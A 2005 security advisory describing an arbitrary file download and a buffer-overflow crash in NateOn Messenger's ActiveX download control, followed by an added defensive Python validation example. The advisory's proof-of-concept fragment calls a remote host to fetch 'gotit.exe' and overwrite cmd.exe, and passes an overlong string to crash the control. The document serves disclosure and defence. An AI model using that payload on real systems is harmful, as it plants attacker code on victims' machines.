Message-ID: <20050929033435.80A62B20@lists.grok.org.uk>
Date: Thu Sep 29 04:34:43 2005
From: saintlinu at yahoo.co.kr (saintlinu)
Subject: [NRVA05-08] - Arbitrary file download by NateOn Messenger's ActiveX and DoS
Title: Arbitrary File Download by NateOn Messenger's ActiveX and DoS
Discoverer: PARK, GYU TAE (saintlinu@...l2root.org)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messenger's ActiveX and DoS
Where: From remote
Operating System: Windows Only
Solution: Not patched yet
Workaround: N/A
Notice: 09. 17. 2005 Initial notification to vendor
09. 23. 2005 2nd notification
09. 27. 2005 3rd notification
09. 29. 2005 Vendor did not respond; vulnerability disclosed
Description:
NateOn Messenger (see NRVA05-02) is an Internet instant messenger in the same class as MSN, Yahoo and so on.
If NateOn Messenger is installed, it can be exploited through the 'NateonDownloadManager.ocx' ActiveX control, whose Excute method writes a remote file to a caller-supplied local path.
There is another vulnerability in the same control, a buffer overflow triggered by an overlong destination string.
See the following details:
The full proof of concept is not included here; only a fragment of the code follows:
<--snip-->
i = GotNate.IsNateonInstall();
if( i == 1 ) {
    alert('NateOn Messenger already installed. Do Attack ...');
    // arbitrary file download: the remote file is written to the caller-supplied local path
    i = GotNate.Excute("1", 'http://saintlinu.null2root.org/gotit.exe', 'c:\\windows\\system32\\cmd.exe');
    // DoS: an overlong destination string crashes the control
    i = GotNate.Excute("1", 'http://saintlinu.null2root.org/gotit.exe', 'very_long_strings_in_here');
} else {
    alert('NateOn Messenger NOT Installed');
}
</--snip-->
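The two defects above share one root cause: the download method trusts both its arguments, the source URL and the destination path, without bounding or confining them. The following is an added example, not code from the advisory or from the NateOn product, showing the validation a download-manager component should apply before touching the disk: a length bound (so an overlong string never reaches a fixed-size native buffer), a scheme check on the URL, and a rule that the caller supplies a bare file name which is always joined under one fixed download directory. The download directory, the length limit and the host name example.invalid are assumptions; the sample requests are constructed and mirror the advisory's two cases plus a benign one.

```python
"""Added example: input validation a download-manager component should apply
before writing a remote file to disk. Illustrative code only, not the
NateonDownloadManager.ocx implementation; the policy values below are assumptions."""
from pathlib import PureWindowsPath
from urllib.parse import urlparse

# Assumed policy: only http(s) sources, only bare file names, bounded length,
# and every file lands inside one fixed download directory.
ALLOWED_SCHEMES = ("http", "https")
MAX_NAME_LEN = 128  # assumed limit, well below MAX_PATH (260) to leave headroom
DOWNLOAD_DIR = PureWindowsPath(r"C:\Users\user\Downloads")  # assumed fixed directory


class RejectedRequest(ValueError):
    """Raised when a download request fails validation."""


def validate_download(url: str, dest_name: str,
                      download_dir: PureWindowsPath = DOWNLOAD_DIR) -> str:
    """Return the full destination path if the request is acceptable, else raise."""
    # 1. Length bound first: an unbounded string reaching a fixed-size native
    #    buffer is the crash condition described in the advisory.
    if not dest_name or len(dest_name) > MAX_NAME_LEN:
        raise RejectedRequest("destination name missing or too long")
    # 2. Only fetch from web origins; this rejects file:, javascript:, UNC, etc.
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.netloc:
        raise RejectedRequest(f"unsupported source URL scheme: {parsed.scheme!r}")
    # 3. The caller supplies a bare file name, never a path. PureWindowsPath
    #    treats both '\\' and '/' as separators and recognises drive letters, so
    #    any directory component, drive or '..' makes .name differ from the input.
    candidate = PureWindowsPath(dest_name)
    if candidate.name != dest_name or candidate.anchor or ".." in candidate.parts:
        raise RejectedRequest("destination must be a bare file name")
    # 4. Reject control characters and trailing dots/spaces, which Windows strips silently.
    if any(ord(c) < 32 for c in dest_name) or dest_name[-1] in ". ":
        raise RejectedRequest("invalid characters in destination name")
    # 5. Join under the fixed directory; the result can only ever land there.
    return str(download_dir / candidate)


def check_request(url: str, dest_name: str) -> bool:
    """Convenience wrapper: True if the request passes validation, False otherwise."""
    try:
        validate_download(url, dest_name)
        return True
    except RejectedRequest:
        return False


if __name__ == "__main__":
    # Constructed sample requests: a benign download, the advisory's arbitrary
    # destination path, and the advisory's overlong destination string.
    samples = [
        ("http://example.invalid/gotit.exe", "gotit.exe"),
        ("http://example.invalid/gotit.exe", r"c:\windows\system32\cmd.exe"),
        ("http://example.invalid/gotit.exe", "A" * 5000),
    ]
    for url, dest in samples:
        verdict = "accepted" if check_request(url, dest) else "rejected"
        print(f"{dest[:40]!r:45} -> {verdict}")
```

The order of the checks matters: the length bound runs before anything parses the string, so the overlong input never reaches code that might copy it into a fixed buffer. Using PureWindowsPath rather than string matching means the bare-name rule holds for forward slashes, drive-relative forms such as C:file.exe and UNC prefixes without a list of hand-written patterns.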